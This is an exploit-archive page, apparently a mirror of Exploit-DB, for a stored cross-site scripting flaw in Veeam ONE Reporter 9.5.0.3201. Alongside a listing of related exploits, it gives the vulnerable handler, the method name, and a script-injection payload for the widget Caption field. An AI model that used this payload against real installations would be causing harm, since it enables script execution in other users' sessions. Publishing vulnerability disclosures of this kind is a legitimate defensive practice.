Menu

Improved exploit search engine. Try it out

"Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)"

Author

"Seyed Sadegh Khatami"

Platform

ashx

Release date

2019-04-30

Release Date Title Type Platform Author
2019-04-30 "Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)" webapps ashx "Seyed Sadegh Khatami"
2019-04-30 "Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting" webapps ashx "Seyed Sadegh Khatami"
2019-04-30 "Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery" webapps ashx "Seyed Sadegh Khatami"
2016-02-26 "Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities" webapps ashx LiquidWorm
Release Date Title Type Platform Author
2019-04-30 "Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)" webapps ashx "Seyed Sadegh Khatami"
2019-04-30 "Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting" webapps ashx "Seyed Sadegh Khatami"
2019-04-30 "Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery" webapps ashx "Seyed Sadegh Khatami"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46767/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46767/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46767/41211/veeam-one-reporter-9503201-persistent-cross-site-scripting-addedit-widget/download/", "exploit_id": "46767", "exploit_description": "\"Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)\"", "exploit_date": "2019-04-30", "exploit_author": "\"Seyed Sadegh Khatami\"", "exploit_type": "webapps", "exploit_platform": "ashx", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016


#exploit:

Path: /CommonDataHandlerReadOnly.ashx 

method: setDashboardWidget

SET Caption field to “AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”